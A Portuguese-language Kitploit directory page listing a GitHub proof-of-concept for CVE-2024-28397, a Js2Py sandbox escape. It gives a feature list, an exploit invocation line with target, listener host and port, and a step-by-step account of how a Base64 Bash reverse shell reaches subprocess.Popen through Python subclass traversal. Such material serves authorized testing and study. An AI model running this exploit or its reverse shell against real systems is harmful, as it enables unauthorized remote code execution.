Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-28397-Js2Py-RCE — Este repositório contém uma Prova de Conceito (PoC) para a CVE-2024-28397, uma vulnerabilidade na biblioteca js2py que permite um escape do sandbox para alcançar execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/d3ltaformation/cve-2024-28397-js2py-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubd3ltaformation/cve-2024-28397-js2py-rce

CVE-2024-28397-Js2Py-RCE

Este repositório contém uma Prova de Conceito (PoC) para a CVE-2024-28397, uma vulnerabilidade na biblioteca js2py que permite um escape do sandbox para alcançar execução remota de código.

Ver Repositório
2há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-28397-Js2Py-RCE

Descrição

Este repositório contém uma Prova de Conceito (PoC) baseada em Python para a CVE-2024-28397, uma vulnerabilidade de escape de sandbox no interpretador JavaScript Js2Py para Python. Quando o aplicativo alvo avalia código JS não confiável via Js2Py, um atacante pode escapar da sandbox e executar código Python arbitrário. Isso pode ser usado para obter execução remota de código (RCE) e um reverse shell no sistema vulnerável.

Este exploit foi inspirado no projeto de Marven11 CVE-2024-28397-js2py-Sandbox-Escape.


Aviso Legal

Este script é fornecido apenas para fins educacionais e de teste de penetração autorizados. O uso não autorizado deste script contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal e antiético. O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por este script.


Sobre a Vulnerabilidade

  • ID CVE: CVE-2024-28397
  • Componente: Escape de sandbox do Js2Py
  • Impacto: Acesso irrestrito ao modelo de objetos do Python via __class__.__base__.__subclasses__, levando à execução arbitrária de código
  • Vetor de Ataque: Remoto (através de interface HTTP exposta que avalia JavaScript controlado pelo usuário)

Funcionalidades

  • Entrega automática de payload de reverse shell via RCE em Python
  • Execução de comandos shell codificados em Base64 inline
  • Listener de reverse shell embutido com estabilização básica de PTY
  • Formatação de saída limpa
  • Leve e sem dependências (exceto requests)

Requisitos

  • Python 3.x
  • Módulo requests (pip install requests)
  • Um sistema Linux (para reverse shell via /dev/tcp)
  • Um alvo executando uma implementação vulnerável do Js2Py

Uso

root@kitploit:~
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
  • --target: A URL completa do endpoint da aplicação web vulnerável
  • --lhost: Seu endereço IP local (usado para o reverse shell)
  • --lport: Sua porta local para receber o shell

Como Funciona

  1. O script prepara um reverse shell Bash, codifica-o em Base64 e o injeta em um payload JavaScript.
  2. O payload JS percorre a árvore de objetos do Python usando __class__.__base__.__subclasses__() para encontrar subprocess.Popen.
  3. Ele usa Popen para decodificar e executar o shell.
  4. A máquina do atacante recebe o reverse shell e o estabiliza automaticamente.
Baixar ferramenta